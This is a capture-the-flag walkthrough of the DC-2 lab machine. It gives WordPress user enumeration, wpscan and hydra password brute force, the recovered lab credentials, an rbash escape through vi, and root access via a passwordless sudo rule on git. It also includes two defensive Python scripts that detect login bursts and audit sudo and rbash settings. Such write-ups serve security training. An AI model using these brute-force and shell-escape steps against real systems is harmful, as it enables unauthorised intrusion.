DC-2

Information Gathering

Port Scan

PORT   STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))

############# all port ###############
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)

Open ports: 80, 7744
Add a hosts entry for dc-2 and visit the web page: it is a WordPress site.

WPScan Scan

########## word theme ###########
[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Found By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2020-02-25T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

WordPress version 4.7.10
WordPress theme in use: twentyseventeen

Directory Scan

[screenshot: 2020-03-25-21-31-49]

Vulnerability Search

$searchsploit wordpress 4.7.1
$searchsploit wordpress akismet

WordPress 4.7.1: username enumeration

User Enumeration & Password Brute Force

$wpscan --url http://dc-2 -e u 

admin
jerry
tom
wpscan --url http://dc-2 -U users.txt -P dict.txt

[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

Try the recovered usernames and passwords against SSH

$hydra -L user.txt -P dict.txt ssh://172.16.252.134:7744

[7744][ssh] host: 172.16.252.134 login: tom password: parturient
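The WPScan and hydra runs above both leave a distinctive trace on the target: a burst of failed logins from one source, across several usernames, followed by a single success. The detector below is an added example (not code from the write-up) that shows what that trace looks like on the defender's side. It parses two constructed log excerpts, an OpenSSH auth.log and an Apache access.log in the default combined format, normalises them into login events, and alerts on any (source, service) pair that reaches `threshold` failures inside `window_seconds`, recording whether a success followed the burst. Assumptions: both logs use the same local time, auth.log carries no year (2020 is assumed), and for /wp-login.php a 302 is treated as a successful login and a 200 as a failure; the log lines, process ids and client addresses are constructed, not captured from the lab.

```python
"""Detect password-guessing bursts against sshd and the WordPress login form."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample input (not captured from the lab): an auth.log excerpt with
# a guessing burst from one source followed by a success, and an Apache
# combined-format access.log excerpt with repeated POSTs to /wp-login.php.
AUTH_LOG = """\
Mar 25 21:31:49 DC-2 sshd[1201]: Failed password for tom from 172.16.252.1 port 51234 ssh2
Mar 25 21:31:49 DC-2 sshd[1203]: Failed password for jerry from 172.16.252.1 port 51236 ssh2
Mar 25 21:31:50 DC-2 sshd[1205]: Failed password for invalid user admin from 172.16.252.1 port 51238 ssh2
Mar 25 21:31:50 DC-2 sshd[1207]: Failed password for tom from 172.16.252.1 port 51240 ssh2
Mar 25 21:31:51 DC-2 sshd[1209]: Failed password for jerry from 172.16.252.1 port 51242 ssh2
Mar 25 21:31:52 DC-2 sshd[1211]: Accepted password for tom from 172.16.252.1 port 51244 ssh2
Mar 25 21:40:00 DC-2 sshd[1300]: Failed password for tom from 172.16.252.50 port 40000 ssh2
"""
ACCESS_LOG = """\
172.16.252.1 - - [25/Mar/2020:21:20:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2412
172.16.252.1 - - [25/Mar/2020:21:20:01 +0800] "POST /wp-login.php HTTP/1.1" 200 2412
172.16.252.1 - - [25/Mar/2020:21:20:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2412
172.16.252.1 - - [25/Mar/2020:21:20:02 +0800] "POST /wp-login.php HTTP/1.1" 302 0
172.16.252.50 - - [25/Mar/2020:21:25:00 +0800] "GET /index.php/feed/ HTTP/1.1" 200 9000
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)
APACHE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^ \]]+) [^\]]*\] '
    r'"(?P<method>\w+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_sshd_line(line, year=2020):
    """One sshd password outcome -> event dict, or None for unrelated lines."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # assumed year
    return {"ts": ts, "src": m["src"], "service": "sshd",
            "user": m["user"], "success": m["result"] == "Accepted"}


def parse_wp_login_line(line):
    """One POST to /wp-login.php -> event dict (username is not in the access
    log; 302 is taken as success, anything else as a failed attempt)."""
    m = APACHE_RE.match(line)
    if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S")  # zone offset dropped
    return {"ts": ts, "src": m["src"], "service": "wp-login",
            "user": None, "success": m["status"] == "302"}


def load_events(auth_log=AUTH_LOG, access_log=ACCESS_LOG):
    events = [parse_sshd_line(l) for l in auth_log.splitlines()]
    events += [parse_wp_login_line(l) for l in access_log.splitlines()]
    return [e for e in events if e]


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """One alert per (source, service) whose failures reach `threshold` inside
    a sliding window; notes any success from that source after the burst began."""
    groups = defaultdict(list)
    for ev in events:
        groups[(ev["src"], ev["service"])].append(ev)
    alerts = []
    for (src, service), evs in sorted(groups.items()):
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["success"]]
        for i, first in enumerate(fails):
            burst = [e for e in fails[i:]
                     if (e["ts"] - first["ts"]).total_seconds() <= window_seconds]
            if len(burst) < threshold:
                continue
            later_ok = [e for e in evs if e["success"] and e["ts"] >= first["ts"]]
            alerts.append({
                "src": src, "service": service, "failures": len(burst),
                "users_tried": sorted({e["user"] for e in burst if e["user"]}),
                "success_after_burst": bool(later_ok),
                "compromised_user": later_ok[0]["user"] if later_ok else None,
            })
            break  # one alert per source/service is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(load_events()):
        print(alert)
```

With the default threshold of 5 only the sshd burst from 172.16.252.1 is reported (three usernames tried, then `tom` accepted, which is the "password found, account now in use" case worth paging on); lowering the threshold to 3 also surfaces the wp-login run. A `success_after_burst` alert is the one to treat as a compromise rather than noise, and the lone failure from 172.16.252.50 never trips the rule.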

Intelligence Summary

##### Ports ####
80:Apache 2.4.10
7744:OpenSSH 6.7p1

##### CMS ####
Wordpress 4.7.10
Wordpress Plugin akismet

##### user/passwd ####
Username: jerry, Password: adipiscing
Username: tom, Password: parturient

##### Web admin panel ####
jerry:adipiscing
tom:parturient

##### SSH ####
[7744][ssh] host: 172.16.252.134 login: tom password: parturient

Logging Into the Admin Panel

Apart from Flag 2 there is not much useful information here.

SSH Login

$ssh -p 7744 tom@172.16.252.134

The login shell is a restricted rbash; escape it with vi:

:set shell=/bin/bash
:shell

Flag 3 is in the HOME directory. The cat and tail commands are not available, but less is.

Information Gathering

#### /etc/passwd ####
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash

#### OS version ####
#### kernel version ####

Under HOME there is a usr directory containing the 4 commands the current user is allowed to run. Remembering that there is also a jerry user with a matching password (not sure whether it would work), and that su is not among the 4 allowed commands, I almost got stuck here; in fact a command can simply be run by its absolute path.

$ /usr/bin/find / -iname su -type f 2>/dev/null

/bin/su

/bin/su jerry

Privilege Escalation

After logging in with jerry's password, check what this account may do (sudo -l):

Matching Defaults entries for jerry on DC-2:                                     
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

Escalate privileges with git:

$sudo git -p help
# or
$sudo git help config
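Both boundaries broken on this box, tom's rbash (escaped through vi) and jerry's passwordless sudo on git (escaped through git's pager and help viewer), fail for the same reason: the allowed program can start another program. The audit below is an added example, not code from the write-up, that reviews these two controls from the administrator's side. It reads the `/etc/passwd` lines and the `sudo -l` output shown above (the passwd text is the page's, the `sudo -l` text is reproduced verbatim), plus a constructed list of what tom's `~/usr/bin` might contain, and flags rbash users, allow-listed commands that can spawn a child process, and sudo rules that are passwordless, lack `NOEXEC`, or leave arguments open. The table of shell-capable tools is deliberately limited to the ones the write-up itself relies on (vi/vim, less, git); `RBASH_ALLOWED` and the hardened-rule template are assumptions.

```python
"""Audit rbash allow-lists and `sudo -l` output for programs that can spawn a shell."""
import os
import re

# From the write-up's /etc/passwd excerpt.
PASSWD = """\
tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash
jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash
"""

# The `sudo -l` output shown for jerry (backslashes are literal in sudoers).
SUDO_L_OUTPUT = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""

# Constructed guess at the four commands in ~tom/usr/bin (the page only says
# there are four, that cat/tail are missing and that vi and less work).
RBASH_ALLOWED = ["ls", "scp", "less", "vi"]

# Programs whose ordinary operation launches another process (an editor, a
# pager, a man viewer) and therefore make a poor sudo or rbash boundary on
# their own. Limited to the tools this write-up uses; extend from your policy.
SHELL_CAPABLE = {
    "vi": "editor with command execution",
    "vim": "editor with command execution",
    "less": "pager that can start a child process",
    "git": "starts $PAGER / $EDITOR / man as child processes",
}

# A sudoers rule as `sudo -l` prints it: "(runas) TAG: TAG: /path args, /path2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")


def restricted_users(passwd_text):
    """Users whose login shell is rbash; these depend on their PATH allow-list."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and os.path.basename(fields[6]) == "rbash":
            users.append(fields[0])
    return users


def parse_sudo_l(text):
    """Return (user, rules) from `sudo -l` output; one rule dict per command."""
    user, rules, in_rules = None, [], False
    for line in text.splitlines():
        m = re.match(r"^User (\S+) may run the following commands", line)
        if m:
            user, in_rules = m.group(1), True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            rules.append({"runas": m["runas"], "tags": tags, "cmd": cmd.strip()})
    return user, rules


def audit_sudo(text):
    """Findings for rules that are passwordless, run a shell-capable program
    without NOEXEC, or leave the argument list open."""
    user, rules = parse_sudo_l(text)
    findings = []
    for r in rules:
        binary = os.path.basename(r["cmd"].split()[0])
        problems = []
        if "NOPASSWD" in r["tags"]:
            problems.append("no password required")
        if binary in SHELL_CAPABLE and "NOEXEC" not in r["tags"]:
            problems.append(f"{binary}: {SHELL_CAPABLE[binary]} (no NOEXEC tag)")
        if len(r["cmd"].split()) == 1:
            problems.append("arguments unrestricted")
        if problems:
            findings.append({
                "user": user, "runas": r["runas"], "cmd": r["cmd"], "problems": problems,
                # Template only: pin the arguments to the one task jerry actually needs.
                "suggested": f"{user} ALL=({r['runas']}) NOEXEC: {r['cmd']} <fixed arguments>",
            })
    return findings


def audit_rbash(user, allowed_commands):
    """Allow-listed commands that defeat rbash on their own."""
    return [f"{user}: {c} ({SHELL_CAPABLE[c]})" for c in allowed_commands if c in SHELL_CAPABLE]


if __name__ == "__main__":
    for u in restricted_users(PASSWD):
        print(audit_rbash(u, RBASH_ALLOWED))
    for f in audit_sudo(SUDO_L_OUTPUT):
        print(f)
```

On the page's data this reports tom's `less` and `vi`, and for jerry's rule all three problems at once. Two caveats on the suggested fix: sudo's `noexec` is implemented by preloading a library into the dynamically linked command and does not apply to statically linked binaries, and because git itself spawns helpers, a `NOEXEC` rule must be tested against the exact subcommand jerry needs, otherwise the legitimate use breaks along with the escape.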

Whether or not every flag is found doesn't really matter; what matters are the skills picked up along the way in this penetration test.